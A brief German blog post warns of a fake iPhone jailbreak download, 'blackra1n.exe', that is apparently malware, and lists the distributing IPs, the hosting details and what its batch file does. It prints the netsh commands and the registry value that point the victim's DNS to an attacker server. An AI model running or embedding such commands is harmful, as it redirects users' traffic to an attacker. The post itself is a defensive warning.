THX for visiting my blog… How-To-Dev-Not
Apr 15

Aufgepasst… iPhone bashing wird langsam zur Mode. Die Spamer von iphone-iphone.info (188.210.236.181) versuchen unversierte User eine Malware blackra1n.exe (188.210.236.109) unterzujubeln. Blos leider bekommt man statt einen Jailbreak nur Ärger…

188.210.236.250 (188-210-236-250.hotnet.ro), AS39443, HOTNET-AS SC Hot Net SRL Baia de Aries, Nr 3, Bl 5B, Sc A, Ap 39, Bucuresti, 6.

Die enthaltene Batch verändert die DNS Einstellungen…

Registry Eintrag:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{5D19E473-BE30-416B-B5C7-D8A091C41D2F} "NameServer" = 188.210.236.250

Der Prozess:

(C:\WINDOWS\system32\NETSH.EXE: interface ip set dns "Local Area Connection" static 188.210.236.250) As User: () Creation Flags: (CREATE_DEFAULT_ERROR_MODE CREATE_SUSPENDED) interface ip set dns "wireles network connection" static 188.210.236.250) As User: () Creation Flags: (CREATE_DEFAULT_ERROR_MODE CREATE_SUSPENDED)

Also aufpassen wenn ihr was in die Richtung machen wollt…

Einen Kommentar schreiben

Easy AdSense by Unreal